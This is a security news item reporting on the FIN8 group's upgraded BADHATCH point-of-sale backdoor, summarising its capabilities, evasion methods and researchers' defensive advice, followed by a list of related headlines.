Security News > 2021 > March > FIN8 Hackers Return With More Powerful Version of BADHATCH PoS Malware
One such group is FIN8, a financially motivated threat actor that's back in action after a year-and-a-half hiatus with a powerful version of a backdoor with upgraded capabilities including screen capturing, proxy tunneling, credential theft, and fileless execution.
First documented in 2016 by FireEye, FIN8 is known for its attacks against the retail, hospitality, and entertainment industries while making use of a wide array of techniques such as spear-phishing and malicious tools like PUNCHTRACK and BADHATCH to steal payment card data from point-of-sale systems.
"The BADHATCH malware is a mature, highly advanced backdoor that uses several evasion and defense techniques. The new backdoor also attempts to evade security monitoring by using TLS encryption to conceal Powershell commands."
Noting that at least three different variants of the backdoor have been spotted since April 2020, the researchers said the latest version of BADHATCH abuses a legitimate service called sslp.io to thwart detection during the deployment process, using it to download a PowerShell script, which in turn executes the shellcode containing the BADHATCH DLL. The PowerShell script, besides taking responsibility for achieving persistence, also takes care of privilege escalation to ensure that all commands post the script's execution are run as the SYSTEM user.
A second evasion technique adopted by FIN8 involves passing off communications with the command-and-control server that masquerade as legitimate HTTP requests.
"Like most persistent and skilled cyber-crime actors, FIN8 operators are constantly refining their tools and tactics to avoid detection," the researchers concluded, urging businesses to "Separate the POS network from the ones used by employees or guests" and filter out emails containing malicious or suspicious attachments.
News URL
Related news
- Chinese Hackers Target Linux Systems Using SNOWLIGHT Malware and VShell Tool (source)
- State-Sponsored Hackers Weaponize ClickFix Tactic in Targeted Malware Campaigns (source)
- Chinese hackers target Russian govt with upgraded RAT malware (source)
- Hackers Abuse Russian Bulletproof Host Proton66 for Global Attacks and Malware Delivery (source)
- SuperCard X Android Malware Enables Contactless ATM and PoS Fraud via NFC Relay Attacks (source)
- Iran-Linked Hackers Target Israel with MURKYTOUR Malware via Fake Job Campaign (source)
- North Korean Hackers Spread Malware via Fake Crypto Firms and Job Interview Lures (source)
- Iranian Hackers Maintain 2-Year Access to Middle East CNI via VPN Flaws and Malware (source)
- Russian Hackers Using ClickFix Fake CAPTCHA to Deploy New LOSTKEYS Malware (source)
- Hackers Use TikTok Videos to Distribute Vidar and StealC Malware via ClickFix Technique (source)